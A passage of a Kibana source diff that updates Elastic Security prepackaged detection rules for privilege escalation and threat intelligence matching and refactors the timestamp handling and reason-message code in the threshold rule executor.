account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher\nconfidence. Consider adding exceptions \u2014 preferably with a combination of the user agent and user ID conditions \u2014 to\ncover administrator activities and infrastructure as code tooling.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Use AWS [policy versioning](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-versioning.html) to restore the trust policy to the desired state.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:UpdateAssumeRolePolicy and event.outcome:success\n", "references": [ "https://labs.bishopfox.com/tech-blog/5-privesc-attack-vectors-in-aws" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a60326d7-dca7-4fb7-93eb-1ca03a1febbd", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json index 25de7b35a68ec..ef8c4529ea560 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json @@ -11,15 +11,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Rogue Named Pipe Impersonation", - "note": "## Config\n\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n\n", + "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "file where event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n", "references": [ "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", "https://github.com/zcgonvh/EfsPotato", "https://twitter.com/SBousseaden/status/1429530155291193354" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", + "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal "contains" and keyword equal "pipe"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +60,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json index 469b1a4e9096f..aa0df3481e30d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json @@ -11,15 +11,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Windows Service Installed via an Unusual Client", - "note": "## Config\n\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nSystem > \nAudit Security System Extension (Success)\n```\n", + "note": "", "query": "event.action:\"service-installed\" and (winlog.event_data.ClientProcessId:\"0\" or winlog.event_data.ParentProcessId:\"0\")\n", "references": [ "https://www.x86matthew.com/view_post?id=create_svc_rpc", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0100_windows_audit_security_system_extension.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ClientProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ParentProcessId", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Elastic", @@ -54,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_compiler_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/resource_development_ml_linux_anomalous_compiler_activity.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_compiler_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/resource_development_ml_linux_anomalous_compiler_activity.json index 90288b6127aff..66484b861c66b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_compiler_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/resource_development_ml_linux_anomalous_compiler_activity.json @@ -22,8 +22,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Resource Development" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0042", + "name": "Resource Development", + "reference": "https://attack.mitre.org/tactics/TA0042/" + }, + "technique": [ + { + "id": "T1588", + "name": "Obtain Capabilities", + "reference": "https://attack.mitre.org/techniques/T1588/", + "subtechnique": [ + { + "id": "T1588.001", + "name": "Malware", + "reference": "https://attack.mitre.org/techniques/T1588/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json index a4d5c9b315e0d..174ee2548a178 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json @@ -21,6 +21,38 @@ "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "file.hash.*", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "url.full", + "type": "wildcard" + } + ], "risk_score": 99, "rule_id": "699e9fdb-b77c-4c01-995c-1c15019b9c43", "severity": "critical", @@ -194,5 +226,5 @@ "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json index 2612a8139e30e..410f2731d79ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json @@ -21,6 +21,38 @@ "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "file.hash.*", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "url.full", + "type": "wildcard" + } + ], "risk_score": 99, "rule_id": "0c9a14d9-d65d-486f-9b5b-91e4e6b22bd0", "severity": "critical", @@ -194,5 +226,5 @@ "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts index ebdf002986ffb..6c7d5d581ce61 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { SignalSourceHit, SignalSearchResponse, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts index dd51f7aaef25d..9e285c36f5138 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts @@ -77,6 +77,7 @@ describe('threshold_executor', () => { runtimeMappings: {}, inputIndex: ['auditbeat-*'], primaryTimestamp: TIMESTAMP, + aggregatableTimestampField: TIMESTAMP, }); expect(response.warningMessages.length).toEqual(1); }); @@ -131,6 +132,7 @@ describe('threshold_executor', () => { runtimeMappings: {}, inputIndex: ['auditbeat-*'], primaryTimestamp: TIMESTAMP, + aggregatableTimestampField: TIMESTAMP, }); expect(response.state).toEqual({ initialized: true, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts index b5bf0cdc337a3..39d6ad3f781ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts @@ -52,6 +52,7 @@ export const thresholdExecutor = async ({ ruleDataReader, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }: { inputIndex: string[]; runtimeMappings: estypes.MappingRuntimeFields | undefined; @@ -68,6 +69,7 @@ export const thresholdExecutor = async ({ ruleDataReader: IRuleDataReader; primaryTimestamp: string; secondaryTimestamp?: string; + aggregatableTimestampField: string; }): Promise => { let result = createSearchAfterReturnType(); const ruleParams = completeRule.ruleParams; @@ -107,7 +109,7 @@ export const thresholdExecutor = async ({ // Eliminate dupes const bucketFilters = await getThresholdBucketFilters({ signalHistory, - primaryTimestamp, + aggregatableTimestampField, }); // Combine dupe filter with other filters @@ -135,6 +137,7 @@ export const thresholdExecutor = async ({ runtimeMappings, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }); // Build and index new alerts diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts index 67deaec8e1d23..42c18e523f3d3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts @@ -5,39 +5,50 @@ * 2.0. */ -import { buildReasonMessageUtil } from './reason_formatters'; -import type { SignalSourceHit } from './types'; +import { buildReasonMessageForThresholdAlert, buildReasonMessageUtil } from './reason_formatters'; + +const mergedDoc = { + _index: 'index-1', + _id: 'id-1', + fields: { + 'destination.address': ['9.99.99.9'], + 'destination.port': ['6789'], + 'event.category': ['test'], + 'file.name': ['sample'], + 'host.name': ['host'], + 'process.name': ['doingThings.exe'], + 'process.parent.name': ['didThings.exe'], + 'source.address': ['1.11.11.1'], + 'source.port': ['1234'], + 'user.name': ['test-user'], + '@timestamp': '2021-08-11T02:28:59.101Z', + }, +}; + +const genThresholdMergedDoc = (groupedKeys: Record) => ({ + _index: 'index-1', + _id: 'some-id', + _source: { + '@timestamp': '2022-08-16T11:01:09.848Z', + threshold_result: [Object], + ...groupedKeys, + }, +}); describe('reason_formatter', () => { - let name: string; + let ruleName: string; let severity: string; - let mergedDoc: SignalSourceHit; beforeAll(() => { - name = 'my-rule'; + ruleName = 'my-rule'; severity = 'medium'; - mergedDoc = { - _index: 'index-1', - _id: 'id-1', - fields: { - 'destination.address': ['9.99.99.9'], - 'destination.port': ['6789'], - 'event.category': ['test'], - 'file.name': ['sample'], - 'host.name': ['host'], - 'process.name': ['doingThings.exe'], - 'process.parent.name': ['didThings.exe'], - 'source.address': ['1.11.11.1'], - 'source.port': ['1234'], - 'user.name': ['test-user'], - '@timestamp': '2021-08-11T02:28:59.101Z', - }, - }; }); describe('buildReasonMessageUtil', () => { describe('when rule and mergedDoc are provided', () => { it('should return the full reason message', () => { - expect(buildReasonMessageUtil({ name, severity, mergedDoc })).toMatchInlineSnapshot( + expect( + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc }) + ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); }); @@ -52,7 +63,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"item one, item two event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -68,7 +79,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user created medium alert my-rule."` ); @@ -84,7 +95,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, on host created medium alert my-rule."` ); @@ -100,7 +111,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noDestinationPortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noDestinationPortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9 by test-user on host created medium alert my-rule."` ); @@ -115,7 +126,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noDestinationPortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noDestinationPortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, by test-user on host created medium alert my-rule."` ); @@ -131,7 +142,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noSourcePortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noSourcePortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1 destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -146,7 +157,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noSourcePortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noSourcePortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -163,7 +174,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"test event with file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -180,14 +191,61 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot(`"test event by test-user created medium alert my-rule."`); }); }); describe('when only rule is provided', () => { it('should return the reason message without host name or user name', () => { - expect(buildReasonMessageUtil({ name, severity })).toMatchInlineSnapshot(`""`); + expect(buildReasonMessageUtil({ name: ruleName, severity })).toMatchInlineSnapshot(`""`); + }); + }); + }); + + describe(`buildReasonMessageForThresholdAlert`, () => { + it('When thresold rule is grouped by user.name', () => { + const userName = 'Some User Name'; + const thresholdMergedDoc = genThresholdMergedDoc({ + 'user.name': userName, + }); + expect( + buildReasonMessageForThresholdAlert({ + name: ruleName, + severity, + mergedDoc: thresholdMergedDoc, + }) + ).toEqual(`event by ${userName} created ${severity} alert ${ruleName}.`); + }); + + it('When threshold rule is grouped by host.name', () => { + const hostName = 'Some Host Name'; + const thresholdMergedDoc = genThresholdMergedDoc({ + 'host.name': hostName, }); + + expect( + buildReasonMessageForThresholdAlert({ + name: ruleName, + severity, + mergedDoc: thresholdMergedDoc, + }) + ).toEqual(`event on ${hostName} created ${severity} alert ${ruleName}.`); + }); + it('When threshold rule is grouped by host.name and user.name', () => { + const hostName = 'Some Host Name'; + const userName = 'Some User Name'; + const thresholdMergedDoc = genThresholdMergedDoc({ + 'host.name': hostName, + 'user.name': userName, + }); + + expect( + buildReasonMessageForThresholdAlert({ + name: ruleName, + severity, + mergedDoc: thresholdMergedDoc, + }) + ).toEqual(`event by ${userName} on ${hostName} created ${severity} alert ${ruleName}.`); }); }); }); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts index 0b9148d995c74..88aa69186e58a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts @@ -35,7 +35,7 @@ interface ReasonFields { } const getFieldsFromDoc = (mergedDoc: SignalSourceHit) => { const reasonFields: ReasonFields = {}; - const docToUse = mergedDoc?.fields || mergedDoc; + const docToUse = mergedDoc?.fields || mergedDoc?._source || mergedDoc; reasonFields.destinationAddress = getOr(null, 'destination.address', docToUse); reasonFields.destinationPort = getOr(null, 'destination.port', docToUse); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts index f4851e77f2048..e3c7f8f5ee50e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts @@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import type { SignalSource } from '../../types'; import { filterFieldEntries } from '../utils/filter_field_entries'; import type { FieldsType, MergeStrategyFunction } from '../types'; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts index a5c811bc1a5c1..f5863533ea283 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts @@ -370,9 +370,9 @@ describe('merge_missing_fields_with_source', () => { /** * tests for https://github.com/elastic/kibana/issues/135963 * This test will fail when we replace the import - * import { set } from '@elastic/safer-lodash-set'; + * import { set } from '@kbn/safer-lodash-set'; * to use the fp version - * import { set } from '@elastic/safer-lodash-set/fp'; + * import { set } from '@kbn/safer-lodash-set/fp'; * and switch around the return inside of filteredEntries.reduce * to be the following: * return set(fieldsKey, valueToMerge, merged); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts index 89695f6b562b0..c20f6b55301bd 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts @@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { SignalSource } from '../../types'; import { filterFieldEntries } from '../utils/filter_field_entries'; import type { FieldsType, MergeStrategyFunction } from '../types'; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts index cc5096825951f..8bb490c2d62df 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts @@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import type { SearchTypes } from '../../../../../../common/detection_engine/types'; import type { FieldsType } from '../types'; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts index 41881d538927c..8330d545cf78f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts @@ -5,20 +5,19 @@ * 2.0. */ +import { TIMESTAMP } from '@kbn/rule-data-utils'; import { buildThresholdMultiBucketAggregation, buildThresholdSingleBucketAggregation, } from './build_threshold_aggregation'; describe('build_threshold_aggregation', () => { - const timestampField = '@timestamp'; - describe('build_threshold_multi_bucket_aggregation', () => { const threshold = { field: ['host.name', 'source.ip'], value: 2 }; it('Generates aggregation without cardinality', async () => { const aggs = buildThresholdMultiBucketAggregation({ threshold, - timestampField, + aggregatableTimestampField: TIMESTAMP, sortKeys: undefined, }); expect(aggs).toStrictEqual({ @@ -34,12 +33,12 @@ describe('build_threshold_aggregation', () => { }, max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }, @@ -74,7 +73,7 @@ describe('build_threshold_aggregation', () => { }; const aggs = buildThresholdMultiBucketAggregation({ threshold: thresholdWithCardinality, - timestampField, + aggregatableTimestampField: TIMESTAMP, sortKeys: undefined, }); expect(aggs).toStrictEqual({ @@ -103,12 +102,12 @@ describe('build_threshold_aggregation', () => { }, max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }, @@ -141,16 +140,19 @@ describe('build_threshold_aggregation', () => { const threshold = { field: [], value: 3 }; it('Generates aggregation without cardinality', async () => { - const aggs = buildThresholdSingleBucketAggregation({ threshold, timestampField }); + const aggs = buildThresholdSingleBucketAggregation({ + threshold, + aggregatableTimestampField: TIMESTAMP, + }); expect(aggs).toStrictEqual({ max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }); @@ -163,7 +165,7 @@ describe('build_threshold_aggregation', () => { }; const aggs = buildThresholdSingleBucketAggregation({ threshold: thresholdWithCardinality, - timestampField, + aggregatableTimestampField: TIMESTAMP, }); expect(aggs).toStrictEqual({ cardinality_count: { @@ -173,12 +175,12 @@ describe('build_threshold_aggregation', () => { }, max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts index 6130013a0fe98..f0b808e743772 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts @@ -10,11 +10,11 @@ import { shouldFilterByCardinality } from './utils'; export const buildThresholdMultiBucketAggregation = ({ threshold, - timestampField, + aggregatableTimestampField, sortKeys, }: { threshold: ThresholdNormalized; - timestampField: string; + aggregatableTimestampField: string; // eslint-disable-next-line @typescript-eslint/no-explicit-any sortKeys: Record | undefined; }) => { @@ -34,12 +34,12 @@ export const buildThresholdMultiBucketAggregation = ({ aggs: { max_timestamp: { max: { - field: timestampField, + field: aggregatableTimestampField, }, }, min_timestamp: { min: { - field: timestampField, + field: aggregatableTimestampField, }, }, ...(shouldFilterByCardinality(threshold) @@ -74,19 +74,19 @@ export const buildThresholdMultiBucketAggregation = ({ export const buildThresholdSingleBucketAggregation = ({ threshold, - timestampField, + aggregatableTimestampField, }: { threshold: ThresholdNormalized; - timestampField: string; + aggregatableTimestampField: string; }) => ({ max_timestamp: { max: { - field: timestampField, + field: aggregatableTimestampField, }, }, min_timestamp: { min: { - field: timestampField, + field: aggregatableTimestampField, }, }, ...(shouldFilterByCardinality(threshold) diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts index 1d17d1ed63966..acd444146dbc7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts @@ -13,6 +13,8 @@ import * as single_search_after from '../single_search_after'; import { findThresholdSignals } from './find_threshold_signals'; import { TIMESTAMP } from 